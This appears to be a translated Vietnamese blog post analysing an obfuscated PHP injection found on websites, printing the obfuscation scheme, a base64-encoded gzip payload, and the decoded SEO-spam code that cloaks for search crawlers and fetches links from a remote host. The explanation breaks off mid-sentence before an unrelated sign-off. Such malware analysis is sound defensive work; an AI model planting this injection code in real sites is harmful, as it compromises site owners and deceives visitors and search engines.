Chúng tôi tiếp tục thấy sự gia tăng số lượng các inject PHP này sử dụng nhiều phương thức che giấu để trốn tránh sự phát hiện, nhưng gần đây một phương pháp đã được sử dụng ngày càng nhiều:
$GZN = "aT7k JdM_0VN5/Y1qQt
ym'oL*eIGS:c+ZhCbpREi)63rHBzDsXxOfKw;,.Wvn4=(lu9UjgF8AP2";
$hfl = $GZN[31].$GZN[0].$GZN[65].$GZN[65].$GZN[8].$GZN[66].$GZN[49].$GZN[26].$GZN[44].$GZN[8].$GZN[53].$GZN[66].$GZN[61].$GZN[31];
$fMk = $GZN[31].$GZN[44].$GZN[26].$GZN[0].$GZN[18].$GZN[26].$GZN[8].$GZN[53].$GZN[66].$GZN[61].$GZN[31].$GZN[18].$GZN[40].$GZN[23].$GZN[61]...
Phương thức che giấu này sử dụng một biến ( $ GZN ) để lưu trữ một chuỗi ký tự dài trông như thể chúng có thể được mã hóa hoặc mã hóa vì chúng thường không thể hiểu được. Một biến thứ hai, ( $ hfl ), sau đó được tạo và gán mã PHP được tạo bằng cách sử dụng chuỗi dài $ GZN đầu tiên và các số cụ thể tương ứng với các chỉ số hoặc ký tự của mảng chuỗi trong trường hợp này. Chúng tôi kết thúc với hàm call_user_func sau khi giải mã biến $ hfl , bạn có thể thấy chính mình bằng cách tra cứu giá trị chuỗi tương ứng cho $ GZN [ số (tức là 31 khớp với ký tự c- chỉ cần nhớ mảng bắt đầu từ 0 nên trong chuỗi ký tự c thực sự là vị trí thứ 32). Quá trình này được lặp lại cho các biến khác vì có ít hoặc không có chức năng PHP trong văn bản thuần túy.
Sau khi lặp lại quy trình để khử nhiễu tất cả các biến khác, tôi kết thúc với các điều sau đây
@$hfl($fMk($JLU,$GAa($Fd3($GZN[22].$GZN[33].$GZN[14].$GZN[13].$GZN[46].$GZN[29].$GZN[72].$GZN[7].$GZN[55].$GZN[28].$GZN[7].$GZN[50].$GZN[13].$GZN[65].$GZN[6].$GZN[73].$GZN[11].$GZN[3].$GZN[9].$GZN[46]
ta có thể sử dụng phương thức tương tự như trước đây để giải mã mã PHP ở trên thành một thứ dễ đọc hơn
call_user_func(create_function(gzinflate(base64_decode('\''.'ZY/BS8MwGMX/ldANk0BpLx7E0dkdil4cMqsXGeFbmyahaVKar+Iw/u9uzIPi6fHj8R7vmY6wcpykEgNgoxldKO+VlXEILh6MUxEswrsJCBFCH4+gvY/g7cLQlJRL8VztXqvdG32o6yfxciKxua+2Nd1z/rnU7TUpSMBJwiAa71B+oGhOhJLBNMGRUY040mL9Q2gG6WekpFiTG875ishGe1J2xkqhJF5KHAaWnIO3ed6qHoINrc7CnFvX590hG/V41xZJ9mveRcV281jRfZZczX/tf+tT0oENMiXnD3z19Q0='.'\''))),'1','1');
cuối cùng là chỉ khử các tải trọng độc hại thực sự của tệp, trong trường hợp này chỉ là gz được nén và mã hóa với base64, do đó, bằng cách sử dụng một công cụ hoặc chỉ là mã PHP sẽ cho phép bạn hủy bỏ nó một cách nhanh chóng
if (@preg_match('#google|msn|bing|altavista|ask|yahoo|aol#i', @$_SERVER['HTTP_USER_AGENT'])){
$hd4 = stream_context_create(array('http'=>array('timeout' => 8))); echo @file_get_contents("http://[redacted]/lnk/fb.php?d=".@$_SERVER['SERVER_NAME']."&u=".@$_SERVER['HTTP_USER_AGENT'], false, $hd4);
}
Nó hóa ra là một tác nhân injection spam SEO nhắm mục tiêu các tác nhân người dùng trình thu thập thông tin và cung cấp cho họ các URL cụ thể mà họ muốn tăng trong bảng xếp hạng hoặc từ khóa của họ, tuy nhiên trong trường hợp này,
Hello, Tôi là Một anh chàng ăn xin ăn may vớ được cái bánh mỳ trong thùng rác. nếu bạn thích blog này hãy cho những người ăn xin ngoài đường 1 bữa ăn.
Không có nhận xét nào:
Đăng nhận xét